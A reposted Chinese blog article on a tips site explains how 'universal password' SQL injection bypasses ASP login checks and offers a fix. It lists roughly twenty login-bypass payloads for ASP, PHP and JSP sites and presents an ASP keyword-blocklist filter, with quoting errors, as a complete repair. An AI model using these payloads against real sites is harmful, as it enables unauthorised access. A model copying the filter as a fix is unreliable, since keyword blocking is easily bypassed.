电脑技巧.图片新闻 | 用户注册 | 用户中心 | 发表文章 | 留言簿 | 二维码
  |繁体中文|  RSS订阅 |极速版  |扫描二维码  
电脑技巧,计算机,电脑知识,组装维修,经验,资料精华宝库,HUGESKY CMS官网,鸿天全站,HUGESKY-万能密码登陆网站后台原理及漏洞修复方法技巧
本站申明:
本站尽量纯净无广告,提供交流学习类共享资料。[广告投放说明] [联系]
  • 首 页
  • 电脑知识
  • 应用技巧
  • 组装技巧
  • 维修技巧
  • 网络技巧
  • 组网通信
  • 办公技巧
  • 技巧视频
  • 编程技巧
  • 防毒技巧
  • 博客圈
会员注册关闭
帐号: 密码: 验证码: 点击显示验证码 记住
电脑技巧 -> 防毒技巧 -> 红客黑客

万能密码登陆网站后台原理及漏洞修复方法技巧

作者: chance2015 来源: 网络收集https://blog.csdn.net/chance2015/article/deta 整理日期: 2019-09-10
推荐指数: 点击:1515   文字大小: 加入收藏夹

说明:此方法只适用于网站登录中没有对用户名和密码字符串中的单引号进行过滤的网站。

万能密码这是个比较老的漏洞了,如果你的网站存在这个漏洞,结果肯定非常的悲剧。任何一个初学黑客技术的新人都能很轻松的入侵掉你的网站。因为需要入侵存在这种漏洞的网站不存在任何的技术含量,简单打个密码就行。。但如今还有很多网站管理员都没重视。。以至于让自己的服务器沦落成业内人士常说“万人骑”

要修复此漏洞首先需要了解该漏洞的原理,是什么愿意导致漏洞的产生。
 
下面就来解释下给大家吧! 原理是这样的:


(以下全部以asp为例子) 很多网站把密码放到数据库中,在登陆验证中一般都用以下sql查询语句去查找数据库, sql=select * from user where username='username' 
sql="select * from user where username='"&username&"'and pass='"& pass&'" ,
 
如果用户提交的用户名密码和数据库里面的一样就让你登录,反之则不行。
 
or 是一个逻辑运算符,作用是在判断两个条件的时候,只要其中一个条件成立,那么
 
等式将会成立.而在语言中,是以1来代表真的(成立).那么在这行语句中,原语句的"and"验证将不再
 
继续,而因为"1=1"和"or"令语句返回为真值.。(其实也好理解,英文or是或者的意思,也就是说
 
这个或者那个中有一个是对的,那么整句话就对的,那我还管你后面的and干什么呢?)好了,
 
我们根据sql这个特性构造一个特殊的用户名和密码来绕过它的验证,就用我构造的那个'or' '=' ,
 
用户名和密码都是'or' '=',我们来看看放到整个程序中会是什么样子。
 
sql="select * from user where username=' 'or' '=' 'and pass=' 'or' '=' ' (注意,or前面和=后面都不是
 
双引号,而是两个单引号,查询语句里面没有双引号,双引号只是让里面的变量变成字符而已,
 
我们查询的时候双引号中的变量就被我们提交的数据所代替),好了,现在整句话的意思是:从数
 
据库的user表中查找的用户名是空(两个单引号之间没东西当然是空了:))或者空等于空。废
 
话,因为空当然等于空了,所以程序就认为你提交的数据是合法的,于是就放你通过拉and后面
 
的密码验证都不要了。
 
有人问,是不是只有这个'or' '=' 才可以绕过验证呢? NO
 
根据这个原理我就可以随便构造我喜欢的语句,比如 aweige' or 'aweige'<>'骆驼 
 
这样放进去就变成了用户名是aweige或者aweige不等于骆驼,废话,aweige当然不不等于骆驼拉 
难道还等于骆驼啊??于是就给我放行了。大家也可以根据自己的喜欢去构造这样的语句,

 asp aspx万能密码
  1: "or "a"="a
   2: ')or('a'='a
   3:or 1=1--
   4:'or 1=1--
   5:a'or' 1=1--
   6: "or 1=1--
   7:'or'a'='a
   8: "or"="a'='a
   9:'or''='
   10:'or'='or'
   11: 1 or '1'='1'=1
   12: 1 or '1'='1' or 1=1
   13: 'OR 1=1%00
   14: "or 1=1%00
   15: 'xor
   16: 新型万能登陆密码
   用户名 ' UNION Select 1,1,1 FROM admin Where ''=' (替换表名admin)
   密码 1
   Username=-1%cf' union select 1,1,1 as password,1,1,1 %23
   Password=1
   17..admin' or 'a'='a 密码随便


   PHP万能密码:

   'or'='or'
   'or 1=1/* 字符型 GPC是否开都可以使用
   User: something
   Pass: ' OR '1'='1

   jsp 万能密码:

   1'or'1'='1
   admin' OR 1=1/*
   用户名:admin 系统存在这个用户的时候 才用得上
   密码:1'or'1'='1

 
修复方法很简单,复制以下代码:
 
程序代码:
 
 

ASP 代码复制内容到剪贴板
  1. <%       
  2.         
  3. Dim Query_Badword,Form_Badword,i,Err_Message,Err_Web,name       
  4.         
  5. '------定义部份头----------------------------------------------------------------------       
  6.         
  7. Err_Message = 3 '处理方式:1=提示信息,2=转向页面,3=先提示再转向       
  8.         
  9. Err_Web = "dl.Asp" '出错时转向的页面       
  10.         
  11. Query_Badword="'∥and∥select∥update∥chr∥delete∥%20from∥;∥insert∥mid∥master.∥set∥chr(37)∥="      
  12.         
  13. '在这部份定义get非法参数,使用"∥"号间隔       
  14.         
  15. Form_Badword="'∥(∥)∥;∥=" '在这部份定义post非法参数,使用"∥"号间隔       
  16.         
  17. '------定义部份尾-----------------------------------------------------------------------       
  18.         
  19. On Error Resume Next      
  20.         
  21. '----- 对 get query 值 的过滤.       
  22.         
  23. if request.QueryString<>"" then       
  24. Chk_badword=split(Query_Badword,"∥")       
  25. FOR EACH Query_Name IN Request.QueryString       
  26. for i=0 to ubound(Chk_badword)       
  27. If Instr(LCase(request.QueryString(Query_Name)),Chk_badword(i))<>0 Then      
  28. Select Case Err_Message       
  29. Case "1"      
  30. htm = htm& "<Script Language=JavaScript>alert('传参错误!参数 "&name" 的值中包含非法字符串!nn请不要在参数中出现:and update delete ; insert mid master 等非法字符!');WINdow.close();</Script>"      
  31. Case "2"      
  32. htm = htm& "<Script Language=JavaScript>location.href='"&Err_Web"'</Script>"      
  33. Case "3"      
  34. htm = htm& "<Script Language=JavaScript>alert('传参错误!参数 "&name"的值中包含非法字符串!nn请不要在参数中出现:and update delete ; insert mid master 等非法字符!');location.href='"&Err_Web"';</Script>"      
  35. End Select      
  36. Response.End      
  37. End If      
  38. NEXT       
  39. NEXT       
  40. End if       
  41.         
  42. '-----对 post 表 单值的过滤.       
  43.         
  44. if request.form<>"" then       
  45. Chk_badword=split(Form_Badword,"∥")       
  46. FOR EACH name IN Request.Form       
  47. for i=0 to ubound(Chk_badword)       
  48. If Instr(LCase(request.form(name)),Chk_badword(i))<>0 Then      
  49. Select Case Err_Message       
  50. Case "1"      
  51. htm = htm& "<Script Language=JavaScript>alert('出错了!表单 "&name" 的值中包含非法字符串!nn请不要在表单中提交非法字符!');window.close();</Script>"      
  52. Case "2"      
  53. htm = htm& "<Script Language=JavaScript>location.href='"&Err_Web"'</Script>"      
  54. Case "3"      
  55. htm = htm& "<Script Language=JavaScript>alert('出错了!参数 "&name"的值中包含非法字符串!nn请不要在表单中提交非法字符!');location.href='"&Err_Web"';</Script>"      
  56. End Select      
  57. Response.End      
  58. End If      
  59. NEXT       
  60. NEXT       
  61. end if       
  62.         
  63.         
  64. %>      


 
 
另存为xx.asp文件
然后将xx.asp放入网站与conn.asp文件同一目录下
然后复制以下代码
 
程序代码:


<!--#include file="xx.asp"-->
 
粘贴在你网站数据库连接文件conn.asp里,一般复制在conn.asp顶部。
经此,就可以轻松修复网站后台可以使用万能密码'or''=''or'登陆的漏洞了。

————————————————
版权声明:本文为CSDN博主「chance2015」的原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/chance2015/article/details/50402520

获得更多 -> 防毒技巧 -> 红客黑客
技术支持

责任编辑: webmaster >>> 百度上搜索  谷歌上搜索

hugesky
点击复制本连接 (http://www.hugesky.com/showarticle.php?id=6871)

  转换为打印版本   在本站发表文章    关闭本页窗口
 PHP代码安全检测方法和处理技巧
 安全控制防止外部提交的PHP思路及解决技巧

>>> 相关资讯:

  • . js验证绕过文件上传漏洞js脚本
  • . ADSL远程盗号竟如此简单
  • . [组图]历史上五大最著名的黑客
  • . [图文]Radmin使用教程技巧速成
  • . 红客历史主要事件
  • . 揭秘360泄漏用户手机隐私全过程
  • . 防止外部提交表单禁止跨站提交的PHP简
  • . FLASHFXP空密码登陆方法
  • . 黑客入侵wifi和手机,你想到了吗?
  • . 您的手机已被监听啦!
【声明】:
以上文章或资料除注明为电脑技巧原创或编辑整理外,均为网络收集整理或网友推荐。以上内容以共享、参考、研究为目的,不存在任何商业目的。
未注明作者或出处的文章,可能资料来源不规范。如有涉及版权请给予及时联系更正或予以删除。
评论:(开放)

  网友评论: 评  
以下网友评论只代表网友个人观点,不代表本站观点
  发表评论:(匿名用户不能发表评论! 注册 登陆)
昵称: 验证码:
评分:
5 4 3 2 1
内容:
  请文明参与讨论,禁止漫骂攻击。
 
·用户发表意见仅代表其个人意见,并且承担一切因发表内容引起的纠纷和责任.
·本站管理人员有权在不通知用户的情况下删除不符合规定的评论信息或留做证据.
·请客观的评价您所看到的资讯,提倡就事论事,杜绝漫骂和人身攻击等不文明行为.
内容搜索
    • 站内搜索
热门资讯
  • [图文]来,来,来,火绒剑干掉Aliba...
  • 公共DNS服务器IP地址大全
  • 电脑快捷键全都在这了!电脑技巧...
  • 图说最常用的10个电脑技巧
  • 别说你不会?这9个电脑技巧你必须...
  • Win7解决C盘占用空间大的方法
  • 网银密码设置小技巧
  • win7安装AHCI驱动
  • [推荐]五步搞定电脑网络安全 五步...
  • 平板电脑选购六大要点
广告位置
开启模板:NEWSKY -关于版权 - 隐私保护 - 联系我们 - 网站地图 - 会员列表 - 加入收藏 - 返回顶部

我问佛:如何才能如你般睿智? 佛曰:佛是过来人,人是未来佛。
部分资源收集于互联网并遵循 署名-非商业性使用-相同方式共享3.0共享,尽量署名原创。
据《信息网络传播权保护条例》 如侵犯您的权利,请联系webmaster(at)hugesky.com删除。
Power By HugeSky.Com
Copyright© www.hugesky.com
Powered by HUGESKY CMS 7.1.1.1080918 professional licensed